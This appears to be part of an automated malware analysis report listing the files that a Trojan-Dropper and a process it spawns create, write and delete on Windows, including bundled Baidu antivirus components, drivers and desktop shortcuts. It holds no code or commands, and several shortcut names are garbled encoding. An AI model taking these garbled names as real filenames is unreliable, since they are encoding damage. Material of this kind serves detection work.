%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\xinwen[1].htm (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\aaa1[1].jpg (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\aaa7[1].jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\aaa4[1].jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\aaa10[1].jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\nvxing_509_366[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\meinv[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\core[1].php (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\aaa2[1].jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\lieqi_509_366[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\aaa5[1].jpg (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\b16[1].jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\b15[1].jpg (0 bytes)

The process %original file name%.exe:464 makes changes in the file system.
The Trojan-Dropper creates and/or writes to the following file(s):

%Program Files%\shandian\ico\360.ico (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\desktop.ini (67 bytes)
%Program Files%\shandian\bin\shandian.ini (74 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\stat[1].htm (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf2.tmp\config0.ini (3 bytes)
%Documents and Settings%\%current user%\Desktop\Internet Explorer.lnk (1 bytes)
%Program Files%\shandian\home.bat (691 bytes)
%Program Files%\shandian\bin\shandian.exe (28332 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf2.tmp\F30241_s_0523.exe (91814 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf2.tmp\Md5dll.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\emaaif_70690[1].rar (12288 bytes)
%Program Files%\shandian\ico\ie.ico (700 bytes)
%Documents and Settings%\%current user%\Desktop\Ãƒâ€°ÃƒÂÃ‚ÂµÃƒÂ§ÃƒÂ¤Ã‚Â¯Ãƒâ‚¬Ãƒâ‚¬Ãƒâ€ ÃƒÂ·.lnk (505 bytes)
%Program Files%\shandian\config.ini (194 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf2.tmp\xID.dll (10 bytes)
%Program Files%\shandian\uninst.exe (860 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Ãƒâ€°ÃƒÂÃ‚ÂµÃƒÂ§ÃƒÂ¤Ã‚Â¯Ãƒâ‚¬Ãƒâ‚¬Ãƒâ€ ÃƒÂ·.lnk (700 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\F30241_s_0523[1].rar (91814 bytes)
%Program Files%\shandian\ico\anquan.ico (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf2.tmp\emaaif_70690.exe (12288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf2.tmp\System.dll (11 bytes)
%Program Files%\shandian\ico\taobao.ico (15 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Ãƒâ€°ÃƒÂÃ‚ÂµÃƒÂ§ÃƒÂ¤Ã‚Â¯Ãƒâ‚¬Ãƒâ‚¬Ãƒâ€ ÃƒÂ·\Ãƒâ€°ÃƒÂÃ‚ÂµÃƒÂ§ÃƒÂ¤Ã‚Â¯Ãƒâ‚¬Ãƒâ‚¬Ãƒâ€ ÃƒÂ·.lnk (694 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf2.tmp\config.ini (3 bytes)
%Program Files%\shandian\bin\sdad.exe (12955 bytes)
%Program Files%\shandian\shandian.exe (3121 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Ãƒâ€°ÃƒÂÃ‚ÂµÃƒÂ§ÃƒÂ¤Ã‚Â¯Ãƒâ‚¬Ãƒâ‚¬Ãƒâ€ ÃƒÂ·\ÃƒÂÃ‚Â¶Ãƒâ€ÃƒËœÃƒâ€°ÃƒÂÃ‚ÂµÃƒÂ§ÃƒÂ¤Ã‚Â¯Ãƒâ‚¬Ãƒâ‚¬Ãƒâ€ ÃƒÂ·.lnk (682 bytes)
%Documents and Settings%\%current user%\Desktop\360Ã‚Â°Ã‚Â²ÃƒË†Ã‚Â«ÃƒÂ¤Ã‚Â¯Ãƒâ‚¬Ãƒâ‚¬Ãƒâ€ ÃƒÂ·.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf2.tmp\bind.dll (1207 bytes)

The Trojan-Dropper deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsa1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\emaaif_70690[1].rar (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\stat[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\F30241_s_0523[1].rar (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\emaaif_70690[1].rar (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\F30241_s_0523[1].rar (0 bytes)

The process F30241_s_0523.exe:1072 makes changes in the file system.
The Trojan-Dropper creates and/or writes to the following file(s):

%Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\BDKVUpdate.rdb (13584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm5.tmp (911727 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BaiduSdBugRpt.exe (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMSRCore.dll (10136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDDownLoadProtectPlugin.dll (12536 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMSkin.dll (8281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\DriverManager.dll (4992 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\TrayDldProtect.rdb (6360 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\Microsoft.VC80.ATL\atl80.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\bd0001.dll (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDPerflog.dll (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDShellExt.dll (15168 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\bd0002.sys (7192 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\BDKVTrayTipsPlugin.dll (673 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDCooly.dll (44 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDKVMainFrame.dll (7345 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\Microsoft.VC80.CRT\msvcm80.dll (16424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMLog.dll (784 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\licenses\directui license.txt (593 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\bduf.dll (1425 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDPerflog.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\blacksign.dat (852 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\BDMSkin.dll (37025 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\811.dat (8 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\iexplore.exe.xml (528 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\BDKVQuarantine.rdb (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\KVMainframe_PluginConfig.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDShellExt64.dll (14184 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMAVE.dll (673 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\SearchProtection.rdb (5064 bytes)
%WinDir%\Fonts (1248 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkv\Microsoft.VC80.ATL\Microsoft.VC80.ATL.manifest (466 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDKVDownloadProtect.dll (5520 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\BDMAVEng.dll (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDKVDeskBand64.dll (4992 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDLogicUtils.dll (1281 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\ToastLogo.ico (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\RtpContainerConfig.xml (818 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMAVEng.dll (22192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMAVCached.dll (11048 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\KavUpdate.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDKVDownloadProtect_x64.dll (6584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\tuopan.png (3 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\Microsoft.VC80.CRT\msvcm80.dll (16424 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\Microsoft.VC80.CRT\msvcp80.dll (19096 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BaiduSdSvc.exe (15536 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmsysrepair\BSRLib.dat (673 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMLog.dll (32 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BaiduSdTray.exe (10815 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\BDKVTray.rdb (19152 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\drivers\bd0002.sys (1281 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMTinyXml.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\npBaiduSDDetectPlug.dll (3616 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\Microsoft.VC80.CRT\msvcp80.dll (19096 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Microsoft.VC80.CRT\Microsoft.VC80.CRT.manifest (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\DesktopToast.exe (3616 bytes)
%WinDir%\WinSxS\Policies\x86_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_x-ww_77c24773 (4 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Microsoft.VC80.CRT\msvcp80.dll (19096 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\806.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\iexplore.exe.xml (528 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\fm.dat (597 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\blacksign.dat (852 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\tips.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BaiduSdBugRpt.exe (19152 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\Repair_PluginConfig.xml (411 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\Microsoft.VC80.ATL\Microsoft.VC80.ATL.manifest (466 bytes)
%Documents and Settings%\%current user% (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMFrameWork.dll (10136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\systemfile.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M (96 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf2.tmp (4 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¦Ââ‚¬Ã¦Â¯â€™\Ã¥ÂÂ¸Ã¨Â½Â½Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¦Ââ‚¬Ã¦Â¯â€™.lnk (944 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\wverify.dat (66168 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\res\InstallWnd.zip (12536 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDKVDownloadProtect.dll (673 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmsysrepair\Microsoft.VC80.CRT\msvcp80.dll (19096 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDShellExt.dll (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMSkin.dll (37368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\dnw.xml (149 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\ieBaiduSDDetectPlug.dll (4992 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\Microsoft.VC80.CRT\Microsoft.VC80.CRT.manifest (1 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\explugin\ieBaiduSDDetectPlug.dll (601 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDShellExt64.dll (2321 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\KVCommonRes.rdb (132004 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\GameNoDisturb.ini (215 bytes)
%Documents and Settings%\All Users\Desktop\Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¦Ââ‚¬Ã¦Â¯â€™.lnk (959 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\hips.xml (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\CoolyContainerConfig.xml (329 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\KVMainframePluginContainerConfig.xml (384 bytes)
%System%\drivers\bd0003.sys (55 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMBase.dll (7345 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\809.dat (3 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkv\Microsoft.VC80.CRT\msvcm80.dll (16424 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\kav_verify.dat (677 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\index.dat (1404 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMNet.dll (28288 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDDownloader.exe (9605 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\systemfile.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDKVLogs.dll (6584 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMUpdate.dll (673 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMDownload.dll (1425 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\licenses\duilib license.txt (1 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\Microsoft.VC80.CRT\msvcr80.dll (21216 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDKVTrayTipsPlugin.dll (6584 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BAV\bdvs.dat (5 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkv\Microsoft.VC80.CRT\msvcr80.dll (21216 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDUDiskGuard.dll (8560 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\bdvs.dat (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMPatchAgent.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BaiduSdRepair.exe (13584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\NewPih.dll (4992 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\UserDetectionPlugin.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\fm.dat (597 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmsysrepair\Microsoft.VC80.ATL\Microsoft.VC80.ATL.manifest (466 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMAVE.dll (6584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMSDWrench.dll (3312 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDKVLogs.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\PluginInstallHelper.dll (3616 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\BDKVConfig.rdb (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDKVVirusPlugins.dll (12024 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\CompatibilityChecker.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\PrivacyProtect.dll (6360 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\GetSupplyId.dll (3616 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\virus_type.dat (485 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\app.ico (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMTinyXml.dll (6584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDAVCScan.dll (4992 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\drivers\BDMWrench.sys (601 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\updlog.dll (15 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\BDKVTips.rdb (2392 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\Microsoft.VC80.CRT\msvcp80.dll (19096 bytes)
%System%\config (96 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BaiduSdRepair.exe (2321 bytes)
%System%\drivers\bd0002.sys (1281 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\901.dat (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMEvents.dll (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\bdmp.dat (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\ad.dll (15168 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BaiduSd.exe (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BaiduSdUProxy64.exe (23936 bytes)
%WinDir%\Prefetch (480 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkv\BDKVVirusPlugins.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\monitor_config.dat (559 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDDownloader.exe (42222 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMMsg.dll (1552 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\BDDownLoadProtectPlugin.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDKVMainFrame.dll (32128 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\KVMainframe_PluginConfig.xml (1 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDKVWsc.exe (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012014060120140602\index.dat (388 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMRepMgr.dll (10136 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\KVTray_PluginConfig.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\updlog.dll (15 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMEvents.dll (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BaiduSdUpdate.exe (19152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\bd0001.sys (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\CompatibilityChecker.dll (3312 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMReport.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDCooly.dll (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDKVDeskBand.dll (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDArKit.sys (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\804.dat (3 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMMsg.dll (33 bytes)
%Program Files%\Internet Explorer (4 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\RtpContainerConfig.xml (818 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\repairplugins\baidusdRepair.dll (601 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkv\Microsoft.VC80.CRT\msvcp80.dll (19096 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\ToastImage.png (5 bytes)
%WinDir%\WinSxS\Manifests (4 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Microsoft.VC80.CRT\msvcr80.dll (21216 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\ad.dll (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\900.dat (8 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmsysrepair\Microsoft.VC80.CRT\msvcr80.dll (21216 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BaiduSdTray.exe (46916 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMPerfMon.dll (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMStringUtils.dll (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMUpdate.dll (5520 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\DriverManager.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMSREng.dll (9608 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¦Ââ‚¬Ã¦Â¯â€™\Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¦Ââ‚¬Ã¦Â¯â€™.lnk (971 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\806.dat (3 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\tuopan.png (3 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDKVDownloadProtect_x64.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\HIPS.dll (30968 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\tips.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\RepairPluginContainerConfig.xml (228 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMNet.dll (5873 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\810.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5 (4 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\NetService.ini (615 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMFrameWork.dll (1425 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\BDKV.rdb (3312 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\dnw.xml (149 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Microsoft.VC80.ATL\Microsoft.VC80.ATL.manifest (466 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\KVRtp_PluginConfig.xml (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\baidusdRepair.dll (4992 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkv\Microsoft.VC80.CRT\Microsoft.VC80.CRT.manifest (1 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\Microsoft.VC80.ATL\atl80.dll (3312 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\BDUDiskGuard.dll (1281 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDKVDeskBand.dll (673 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\BDMPerfMon.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\KVRtp_PluginConfig.xml (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\scan_mgr_config.dat (5 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\TrustAndIso.dll (1281 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMStringUtils.dll (49 bytes)
%WinDir%\Temp\Perflib_Perfdata_120.dat (4 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\TrayPluginContainerConfig.xml (945 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BaiduSd.exe (13368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\UserDetectionPlugin.dll (5520 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\uninst.exe (5873 bytes)
%System%\drivers\BDArKit.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDKVRmvDevPlugin.dll (8560 bytes)
